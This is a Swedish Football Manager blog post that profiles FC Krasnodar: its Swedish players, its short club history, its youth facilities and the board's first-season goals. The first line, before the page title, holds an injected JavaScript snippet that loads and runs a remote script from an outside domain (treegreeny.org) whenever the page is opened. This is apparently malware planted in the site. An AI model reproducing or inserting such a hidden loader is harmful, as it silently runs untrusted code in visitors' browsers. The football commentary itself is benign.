;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: FK Krasnodar – FMSweden
Meny Stäng

Veckans inspiration: FK Krasnodar

“Tjurarna” kallas klubben för som vi fokuserar på denna vecka, nämligen svenskklubben FC Krasnodar i Ryssland. Den tidigare lagkaptenen Andreas Granqvist har förvisso lämnat klubben, men Marcus Berg är kvar ett tag till. Dessutom spelar Viktor Claesson och Kristoffer Olsson i klubben just nu. Ari da Silva, som spelade i Kalmar FF 2006-07, är ett anfallsalternativ dessutom. Nyckelspelaren Wanderson är dock inte densamme som spelade i GAIS, utan en namne. Ni kanske undrar lite angående historiken? Tja, det finns inte så mycket att tala om där. Klubben grundades inte förrän 2008 av en mångmiljardär och klättrade snabbt i seriesystemet. Efter att ha inlett med några mittenplaceringar har de nu sex raka säsonger där de slutat antingen trea eller fyra. Således väntar de fortsatt på sin första titel, vilket förstås är något att sikta på för dig som startar en save med Krasnodar.

På FM har de “en ungdomsanläggning i absolut världsklass” vilket är den högsta nivån (om jag inte missminner mig). Det lär behövas: dels för att styrelsen ser det som nödvändigt att du utvecklar egna spelare, dels för att medelåldern i truppen är ganska hög i nuläget. Endast tre spelare är under 24 år och hela tio stycken har fyllt 30 år. Särskilt den unge anfallaren Maxim Kutovoy ser lovande ut och kan med fördel slussas in i A-laget. Första säsongen vill styrelsen att du vinner CL-playoff, går till final i cupen och inte minst kommer topp-3 i ligan. Det kan bli tufft med tanke på att du tampas med klubbar som CSKA, Spartak, Lokomotiv och Dynamo Moskva samt Zenit. Som sagt, det lär bli tufft att utmana i toppen samtidigt som truppen är i behov av en rejäl generationsväxling. Men om du väljer att spela med Krasnodar önskar jag dig varmt lycka till. Kanske fortsätta på svenskspåret genom att värva in unga spelare från Allsvenskan?

 

FC Krasnodar logo.svg

Please wait...

Liknande Inlägg

Lämna ett svar